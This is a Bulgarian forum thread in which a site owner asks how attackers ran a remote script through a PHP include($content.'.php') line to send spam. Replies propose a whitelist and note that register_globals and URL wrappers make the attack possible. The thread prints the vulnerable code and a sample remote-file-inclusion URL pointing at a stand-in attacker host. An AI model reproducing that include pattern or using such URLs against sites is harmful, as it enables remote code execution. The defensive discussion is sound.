Питането ми е следното как е възможно да се изпълни чужд скрипт през следния код.

Този подход беше използван наскоро, за изпращане на спам през моят сайт и мейл сървър. Как може да бъде предодвратена такава атака?


<?php
//index.php

include ($content.".php");

?>

http://www.mywebsite.com/index.php?ontent=http://www.hackersite.com/yh2?e

Благодаря предварително.

Защо не проверяваш какво инклудваш ?
Опиши си (примерно в един масив) файловете, които могат да се инклудват
Примерно така:

$allowed = Array("list.php", "show.php", etc..etc);

и след това проверявай GET параметъра

if (in_array($_GET['content'], $allowed)) {
nclude ($content.".php");
}

Поздрави.

Аз вече проверявам дали файла съществува на localhost и чак тогава го инклудвам.

Не мога да си обясня обаче, как може от чужд сървър само чрез тази команда да се манипулира localhos, т.е. на localhost да се изпълняват скриптове, намиращи се на външен сървър при положение, че content.php не съдържа формуляри или променливи.

при register globals on и разрешен url fopen wrapper

http://yoursite/script.php?content=http://anothersite/myscript

include($content.".php")

Съдържаниет е скрито
Влезте за да го видите